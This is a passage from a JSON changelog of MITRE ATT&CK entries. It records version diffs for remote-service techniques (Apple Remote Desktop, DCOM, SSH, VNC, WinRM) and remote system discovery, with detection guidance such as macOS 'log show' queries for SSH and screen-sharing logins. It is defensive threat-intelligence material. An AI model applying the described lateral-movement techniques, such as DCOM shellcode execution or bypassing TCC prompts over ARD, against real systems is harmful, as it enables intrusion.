\"https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html\"}, \"root['external_references'][8]\": {\"source_name\": \"Lockboxx ARD 2019\", \"description\": \"Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.\", \"url\": \"http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html\"}, \"root['external_references'][9]\": {\"source_name\": \"Apple Unified Log Analysis Remote Login and Screen Sharing\", \"description\": \"Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \\u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.\", \"url\": \"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| > | g/techniques/T1078) to log into a service specifically desig | > | g/techniques/T1078) to log into a service specifically desig | ||
| > | ned to accept remote connections, such as telnet, SSH, and V | > | ned to accept remote connections, such as telnet, SSH, and V | ||
| > | NC. The adversary may then perform actions as the logged-on | > | NC. The adversary may then perform actions as the logged-on | ||
| > | user. In an enterprise environment, servers and workstation | > | user. In an enterprise environment, servers and workstation | ||
| > | s can be organized into domains. Domains provide centralized | > | s can be organized into domains. Domains provide centralized | ||
| > | identity management, allowing users to login using one set | > | identity management, allowing users to login using one set | ||
| > | of credentials across the entire network. If an adversary is | > | of credentials across the entire network. If an adversary is | ||
| > | able to obtain a set of valid domain credentials, they coul | > | able to obtain a set of valid domain credentials, they coul | ||
| > | d login to many different machines using remote access proto | > | d login to many different machines using remote access proto | ||
| > | cols such as secure shell (SSH) or remote desktop protocol ( | > | cols such as secure shell (SSH) or remote desktop protocol ( | ||
| > | RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote D | > | RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote D | ||
| > | esktop Services) | > | esktop Services) Legitimate applications (such as [Software | ||
| > | Deployment Tools](https://attack.mitre.org/techniques/T1072 | ||||
| > | ) and other administrative programs) may utilize [Remote Ser | ||||
| > | vices](https://attack.mitre.org/techniques/T1021) to access | ||||
| > | remote hosts. For example, Apple Remote Desktop (ARD) on mac | ||||
| > | OS is native software used for remote management. ARD levera | ||||
| > | ges a blend of protocols, including [VNC](https://attack.mit | ||||
| > | re.org/techniques/T1021/005) to send the screen and control | ||||
| > | buffers and [SSH](https://attack.mitre.org/techniques/T1021/ | ||||
| > | 004) for secure file transfer.(Citation: Remote Management M | ||||
| > | DM macOS)(Citation: Kickstart Apple Remote Desktop commands) | ||||
| > | (Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries | ||||
| > | can abuse applications such as ARD to gain remote code exec | ||||
| > | ution and perform lateral movement. In versions of macOS pri | ||||
| > | or to 10.14, an adversary can escalate an SSH session to an | ||||
| > | ARD session which enables an adversary to accept TCC (Transp | ||||
| > | arency, Consent, and Control) prompts without user interacti | ||||
| > | on and gain access to data.(Citation: FireEye 2019 Apple Rem | ||||
| > | ote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstar | ||||
| > | t Apple Remote Desktop commands) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| > | g/techniques/T1078) to interact with remote machines by taki | > | g/techniques/T1078) to interact with remote machines by taki | ||
| > | ng advantage of Distributed Component Object Model (DCOM). T | > | ng advantage of Distributed Component Object Model (DCOM). T | ||
| > | he adversary may then perform actions as the logged-on user. | > | he adversary may then perform actions as the logged-on user. | ||
| > | The Windows Component Object Model (COM) is a component of | > | The Windows Component Object Model (COM) is a component of | ||
| > | the native Windows application programming interface (API) | > | the native Windows application programming interface (API) | ||
| > | that enables interaction between software objects, or execut | > | that enables interaction between software objects, or execut | ||
| > | able code that implements one or more interfaces. Through CO | > | able code that implements one or more interfaces. Through CO | ||
| > | M, a client object can call methods of server objects, which | > | M, a client object can call methods of server objects, which | ||
| > | are typically Dynamic Link Libraries (DLL) or executables ( | > | are typically Dynamic Link Libraries (DLL) or executables ( | ||
| > | EXE). Distributed COM (DCOM) is transparent middleware that | > | EXE). Distributed COM (DCOM) is transparent middleware that | ||
| > | extends the functionality of COM beyond a local computer usi | > | extends the functionality of COM beyond a local computer usi | ||
| > | ng remote procedure call (RPC) technology.(Citation: Fireeye | > | ng remote procedure call (RPC) technology.(Citation: Fireeye | ||
| > | Hunting COM June 2019)(Citation: Microsoft COM) Permission | > | Hunting COM June 2019)(Citation: Microsoft COM) Permission | ||
| > | s to interact with local and remote server COM objects are s | > | s to interact with local and remote server COM objects are s | ||
| > | pecified by access control lists (ACL) in the Registry.(Cita | > | pecified by access control lists (ACL) in the Registry.(Cita | ||
| > | tion: Microsoft Process Wide Com Keys) By default, only Admi | > | tion: Microsoft Process Wide Com Keys) By default, only Admi | ||
| > | nistrators may remotely activate and launch COM objects thro | > | nistrators may remotely activate and launch COM objects thro | ||
| > | ugh DCOM.(Citation: Microsoft COM ACL) Through DCOM, advers | > | ugh DCOM.(Citation: Microsoft COM ACL) Through DCOM, advers | ||
| > | aries operating in the context of an appropriately privilege | > | aries operating in the context of an appropriately privilege | ||
| > | d user can remotely obtain arbitrary and even direct shellco | > | d user can remotely obtain arbitrary and even direct shellco | ||
| > | de execution through Office applications(Citation: Enigma Ou | > | de execution through Office applications(Citation: Enigma Ou | ||
| > | tlook DCOM Lateral Movement Nov 2017) as well as other Windo | > | tlook DCOM Lateral Movement Nov 2017) as well as other Windo | ||
| > | ws objects that contain insecure methods.(Citation: Enigma M | > | ws objects that contain insecure methods.(Citation: Enigma M | ||
| > | MC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Ja | > | MC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Ja | ||
| > | n 2017) DCOM can also execute macros in existing documents(C | > | n 2017) DCOM can also execute macros in existing documents(C | ||
| > | itation: Enigma Excel DCOM Sept 2017) and may also invoke Dy | > | itation: Enigma Excel DCOM Sept 2017) and may also invoke [D | ||
| > | namic Data Exchange (DDE) execution directly through a COM c | > | ynamic Data Exchange](https://attack.mitre.org/techniques/T1 | ||
| > | reated instance of a Microsoft Office application(Citation: | > | 559/002) (DDE) execution directly through a COM created inst | ||
| > | Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing t | > | ance of a Microsoft Office application(Citation: Cyberreason | ||
| > | he need for a malicious document. | > | DCOM DDE Lateral Movement Nov 2017), bypassing the need for | ||
| > | a malicious document. DCOM can be used as a method of remot | ||||
| > | ely interacting with [Windows Management Instrumentation](ht | ||||
| > | tps://attack.mitre.org/techniques/T1047). (Citation: MSDN WM | ||||
| > | I) |
log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS"
],
"x_mitre_system_requirements": [
"An SSH server is configured and running."
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:15:06.853000+00:00\", \"old_value\": \"2020-03-23 23:43:46.977000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\\n\\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.\", \"old_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\\n\\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\\n \\n-SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)\\n+SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Apple Unified Log Analysis Remote Login and Screen Sharing\", \"old_value\": \"SSH Secure Shell\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \\u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.\", \"old_value\": \"SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins\", \"old_value\": \"https://www.ssh.com/ssh\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Use of SSH may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\\n\\nOn macOS systems log show --predicate 'process = \\\"sshd\\\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \\\"ssh\\\" or eventMessage contains \\\"ssh\\\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n\\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.\", \"old_value\": \"Use of SSH may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n Use of SSH may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\\n+\\n+On macOS systems log show --predicate 'process = \\\"sshd\\\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \\\"ssh\\\" or eventMessage contains \\\"ssh\\\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n+\\n+On Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| > | g/techniques/T1078) to log into remote machines using Secure | > | g/techniques/T1078) to log into remote machines using Secure | ||
| > | Shell (SSH). The adversary may then perform actions as the | > | Shell (SSH). The adversary may then perform actions as the | ||
| > | logged-on user. SSH is a protocol that allows authorized us | > | logged-on user. SSH is a protocol that allows authorized us | ||
| > | ers to open remote shells on other computers. Many Linux and | > | ers to open remote shells on other computers. Many Linux and | ||
| > | macOS versions come with SSH installed by default, although | > | macOS versions come with SSH installed by default, although | ||
| > | typically disabled until the user enables it. The SSH serve | > | typically disabled until the user enables it. The SSH serve | ||
| > | r can be configured to use standard password authentication | > | r can be configured to use standard password authentication | ||
| > | or public-private keypairs in lieu of or in addition to a pa | > | or public-private keypairs in lieu of or in addition to a pa | ||
| > | ssword. In this authentication scenario, the user\u2019s public k | > | ssword. In this authentication scenario, the user\u2019s public k | ||
| > | ey must be in a special file on the computer running the ser | > | ey must be in a special file on the computer running the ser | ||
| > | ver that lists which keypairs are allowed to login as that u | > | ver that lists which keypairs are allowed to login as that u | ||
| > | ser.(Citation: SSH Secure Shell) | > | ser. |
log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_system_requirements": [
"VNC server installed and listening for connections."
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-07 22:14:25.528000+00:00\", \"old_value\": \"2020-03-23 20:41:21.147000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\\u201cremote framebuffer\\u201d) protocol to enable users to remotely control another computer\\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\\n\\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\\n\\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)\", \"old_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.\\n\\nVNC is a desktop sharing system that allows users to remotely control another computer\\u2019s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.\\n+Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\\u201cremote framebuffer\\u201d) protocol to enable users to remotely control another computer\\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\\n \\n-VNC is a desktop sharing system that allows users to remotely control another computer\\u2019s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.\\n+VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\\n+\\n+Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Use of VNC may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\\n\\nOn macOS systems log show --predicate 'process = \\\"screensharingd\\\" and eventMessage contains \\\"Authentication:\\\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n\\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)\", \"old_value\": \"Use of VNC may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n-Use of VNC may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.\\n+Use of VNC may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\\n+\\n+On macOS systems log show --predicate 'process = \\\"screensharingd\\\" and eventMessage contains \\\"Authentication:\\\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n+\\n+Monitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"The Remote Framebuffer Protocol\", \"description\": \"T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.\", \"url\": \"https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2\"}, \"root['external_references'][3]\": {\"source_name\": \"MacOS VNC software for Remote Desktop\", \"description\": \"Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.\", \"url\": \"https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac\"}, \"root['external_references'][4]\": {\"source_name\": \"VNC Authentication\", \"description\": \"Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.\", \"url\": \"https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication\"}, \"root['external_references'][5]\": {\"source_name\": \"Hijacking VNC\", \"description\": \"Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.\", \"url\": \"https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc\"}, \"root['external_references'][6]\": {\"source_name\": \"macOS root VNC login without authentication\", \"description\": \"Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.\", \"url\": \"https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication\"}, \"root['external_references'][7]\": {\"source_name\": \"VNC Vulnerabilities\", \"description\": \"Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.\", \"url\": \"https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/\"}, \"root['external_references'][8]\": {\"source_name\": \"Offensive Security VNC Authentication Check\", \"description\": \"Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.\", \"url\": \"https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/\"}, \"root['external_references'][9]\": {\"source_name\": \"Attacking VNC Servers PentestLab\", \"description\": \"Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.\", \"url\": \"https://pentestlab.blog/2012/10/30/attacking-vnc-servers/\"}, \"root['external_references'][10]\": {\"source_name\": \"Havana authentication bug\", \"description\": \"Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.\", \"url\": \"http://lists.openstack.org/pipermail/openstack/2013-December/004138.html\"}, \"root['external_references'][11]\": {\"source_name\": \"Apple Unified Log Analysis Remote Login and Screen Sharing\", \"description\": \"Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \\u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.\", \"url\": \"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins\"}, \"root['external_references'][12]\": {\"source_name\": \"Gnome Remote Desktop grd-settings\", \"description\": \"Pascal Nowack. (n.d.). Retrieved September 21, 2021.\", \"url\": \"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207\"}, \"root['external_references'][13]\": {\"source_name\": \"Gnome Remote Desktop gschema\", \"description\": \"Pascal Nowack. (n.d.). Retrieved September 21, 2021.\", \"url\": \"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| > | g/techniques/T1078) to remotely control machines using Virtu | > | g/techniques/T1078) to remotely control machines using Virtu | ||
| > | al Network Computing (VNC). The adversary may then perform a | > | al Network Computing (VNC). VNC is a platform-independent d | ||
| > | ctions as the logged-on user. VNC is a desktop sharing syst | > | esktop sharing system that uses the RFB (\u201cremote framebuffer | ||
| > | em that allows users to remotely control another computer\u2019s | > | \u201d) protocol to enable users to remotely control another comp | ||
| > | display by relaying mouse and keyboard inputs over the netwo | > | uter\u2019s display by relaying the screen, mouse, and keyboard i | ||
| > | rk. VNC does not necessarily use standard user credentials. | > | nputs over the network.(Citation: The Remote Framebuffer Pro | ||
| > | Instead, a VNC client and server may be configured with sets | > | tocol) VNC differs from [Remote Desktop Protocol](https://a | ||
| > | of credentials that are used only for VNC connections. | > | ttack.mitre.org/techniques/T1021/001) as VNC is screen-shari | ||
| > | ng software rather than resource-sharing software. By defaul | ||||
| > | t, VNC uses the system's authentication, but it can be confi | ||||
| > | gured to use credentials specific to VNC.(Citation: MacOS VN | ||||
| > | C software for Remote Desktop)(Citation: VNC Authentication) | ||||
| > | Adversaries may abuse VNC to perform malicious actions as | ||||
| > | the logged-on user such as opening documents, downloading fi | ||||
| > | les, and running arbitrary commands. An adversary could use | ||||
| > | VNC to remotely control and monitor a system to collect data | ||||
| > | and information to pivot to other systems within the networ | ||||
| > | k. Specific VNC libraries/implementations have also been sus | ||||
| > | ceptible to brute force attacks and memory usage exploitatio | ||||
| > | n.(Citation: Hijacking VNC)(Citation: macOS root VNC login w | ||||
| > | ithout authentication)(Citation: VNC Vulnerabilities)(Citati | ||||
| > | on: Offensive Security VNC Authentication Check)(Citation: A | ||||
| > | ttacking VNC Servers PentestLab)(Citation: Havana authentica | ||||
| > | tion bug) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or | t | 1 | Adversaries may use [Valid Accounts](https://attack.mitre.or |
| > | g/techniques/T1078) to interact with remote systems using Wi | > | g/techniques/T1078) to interact with remote systems using Wi | ||
| > | ndows Remote Management (WinRM). The adversary may then perf | > | ndows Remote Management (WinRM). The adversary may then perf | ||
| > | orm actions as the logged-on user. WinRM is the name of bot | > | orm actions as the logged-on user. WinRM is the name of bot | ||
| > | h a Windows service and a protocol that allows a user to int | > | h a Windows service and a protocol that allows a user to int | ||
| > | eract with a remote system (e.g., run an executable, modify | > | eract with a remote system (e.g., run an executable, modify | ||
| > | the Registry, modify services).(Citation: Microsoft WinRM) I | > | the Registry, modify services).(Citation: Microsoft WinRM) I | ||
| > | t may be called with the `winrm` command or by any number of | > | t may be called with the `winrm` command or by any number of | ||
| > | programs such as PowerShell.(Citation: Jacobsen 2014) | > | programs such as PowerShell.(Citation: Jacobsen 2014) WinRM | ||
| > | can be used as a method of remotely interacting with [Wind | ||||
| > | ows Management Instrumentation](https://attack.mitre.org/tec | ||||
| > | hniques/T1047).(Citation: MSDN WMI) |
net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1018",
"external_id": "T1018"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/292.html",
"external_id": "CAPEC-292"
},
{
"source_name": "Elastic - Koadiac Detection with EQL",
"description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.",
"url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Daniel Stepanic, Elastic",
"RedHuntLabs, @redhuntlabs"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Network Traffic: Network Connection Creation",
"File: File Access"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "3.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 15:30:00.172000+00:00\", \"old_value\": \"2021-04-13 21:40:23.368000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\\\Windows\\\\System32\\\\Drivers\\\\etc\\\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \\n\", \"old_value\": \"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\\\Windows\\\\System32\\\\Drivers\\\\etc\\\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \\n\\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1 @@\\n Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\\\Windows\\\\System32\\\\Drivers\\\\etc\\\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \\n-\\n-Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.2\", \"old_value\": 